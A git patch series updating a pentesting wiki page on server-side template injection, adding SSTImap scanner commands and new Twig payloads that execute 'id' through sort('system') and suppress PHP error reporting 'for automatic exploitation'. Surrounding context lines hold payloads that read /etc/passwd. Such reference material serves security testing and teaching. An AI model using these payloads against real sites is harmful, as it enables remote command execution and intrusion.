From e4f58422e029c0d09c2da7f1716bb0d6a2022143 Mon Sep 17 00:00:00 2001
From: Vladislav Korchagin
Date: Sun, 7 Jan 2024 09:40:59 +0300
Subject: [PATCH 1/3] Update README.md

---
 .../ssti-server-side-template-injection/README.md | 8 ++++++++
 1 file changed, 8 insertions(+)

diff --git a/pentesting-web/ssti-server-side-template-injection/README.md b/pentesting-web/ssti-server-side-template-injection/README.md
index b7847528e..963b9a97e 100644
--- a/pentesting-web/ssti-server-side-template-injection/README.md
+++ b/pentesting-web/ssti-server-side-template-injection/README.md
@@ -125,6 +125,14 @@ tinja url -u "http://example.com/?name=Kirlia" -H "Authentication: Bearer ey..."
 tinja url -u "http://example.com/" -d "username=Kirlia" -c "PHPSESSID=ABC123..."
 ```
 
+### [SSTImap](https://github.com/vladko312/sstimap)
+
+```bash
+python3 sstimap.py -i -l 5
+python3 sstimap.py -u "http://example.com/ --crawl 5 --forms
+python3 sstimap.py -u 'https://example.com/page?name=John' -s
+```
+
 ### [Tplmap](https://github.com/epinna/tplmap)
 
 ```python

From e06db461f7222e9e03a203936b555a90807c8ce5 Mon Sep 17 00:00:00 2001
From: Vladislav Korchagin
Date: Sun, 7 Jan 2024 22:34:43 +0300
Subject: [PATCH 2/3] Update README.md

---
 pentesting-web/ssti-server-side-template-injection/README.md | 2 ++
 1 file changed, 2 insertions(+)

diff --git a/pentesting-web/ssti-server-side-template-injection/README.md b/pentesting-web/ssti-server-side-template-injection/README.md
index b7847528e..598409af4 100644
--- a/pentesting-web/ssti-server-side-template-injection/README.md
+++ b/pentesting-web/ssti-server-side-template-injection/README.md
@@ -1037,6 +1037,8 @@ If you think it could be useful, read:
 
 {% embed url="https://github.com/Hackmanit/TInjA" %}
 
+{% embed url="https://github.com/vladko312/sstimap" %}
+
 {% embed url="https://github.com/epinna/tplmap" %}
 
 {% embed url="https://github.com/Hackmanit/template-injection-table" %}

From ab550dc1158089bd04345aece2c80b39d343335f Mon Sep 17 00:00:00 2001
From: Vladislav Korchagin
Date: Sun, 7 Jan 2024 22:40:00 +0300
Subject: [PATCH 3/3] Update README.md

---
 pentesting-web/ssti-server-side-template-injection/README.md | 4 ++++
 1 file changed, 4 insertions(+)

diff --git a/pentesting-web/ssti-server-side-template-injection/README.md b/pentesting-web/ssti-server-side-template-injection/README.md
index 598409af4..59196cb6b 100644
--- a/pentesting-web/ssti-server-side-template-injection/README.md
+++ b/pentesting-web/ssti-server-side-template-injection/README.md
@@ -538,6 +538,10 @@ this.evaluate(new String(new byte[]{64, 103, 114, 111, 111, 118, 121, 46, 116, 1
 {{['id']|filter('system')}}
 {{['cat\x20/etc/passwd']|filter('system')}}
 {{['cat$IFS/etc/passwd']|filter('system')}}
+{{['id',""]|sort('system')}}
+
+#Hide warnings and errors for automatic exploitation
+{{["error_reporting", "0"]|sort("ini_set")}}
 ```
 
 **Twig - Template format**